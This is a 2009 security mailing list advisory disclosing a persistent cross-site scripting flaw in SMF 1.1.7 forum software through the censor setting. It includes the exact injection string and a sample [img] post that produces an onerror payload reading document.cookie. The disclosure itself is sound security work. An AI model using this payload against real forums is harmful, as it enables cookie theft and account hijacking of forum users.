SMF 1.1.7 Persistent XSS (requires permision to edit censor)

To: submit@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: SMF 1.1.7 Persistent XSS (requires permision to edit censor)
From: Eduardo Vela <sirdarckcat@xxxxxxxxx>
Date: Tue, 3 Feb 2009 02:56:37 -0600
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=c6jSncT+D3ZyUZ9UyCDOTdf8ysqeSUYKQAjvx8daNSo=; b=DfN4ahwkHm2dn4FuO6h4c3fy3MhvPWz1/NgI58iiM99Xev/gYfC6qB1wdZvbcK0vC9 3n4hhMHEysaKFTbuiy0y2Ns+qIiPEiAQaKeEBJuBDqkcofhPBoU8eS3vxHgqnXcehTle cUx0iOAlYZsIbPiYeWPoUF2kcIKaYgwpoGLSE=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=pNOdVG6/AsXAjFDiQKWJJlKY/4EIwqb2JYwjR0993GKnPM8K3e2BPxjFlYO9NVd4vB w99hV+wwo/wkYAjL9d2gH0VK/cGinm5YCKpkhz3OV+A1fa75bkLQ8WNGKziMwt4Kov3J kZKxl1dYYremHngRCjJyj4fx3M/2e9dPcfl5Y=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/"; onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/"; onerror="alert(document.cookie)"
alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/

Prev by Date: NaviCopa webserver 3.01 Multiple Vulnerabilities
Next by Date: Nokia Multimedia Player v1.1 .m3u Heap Overflow PoC exploit
Previous by thread: NaviCopa webserver 3.01 Multiple Vulnerabilities
Next by thread: Re: SMF 1.1.7 Persistent XSS (requires permision to edit censor)
Index(es):
- Date
- Thread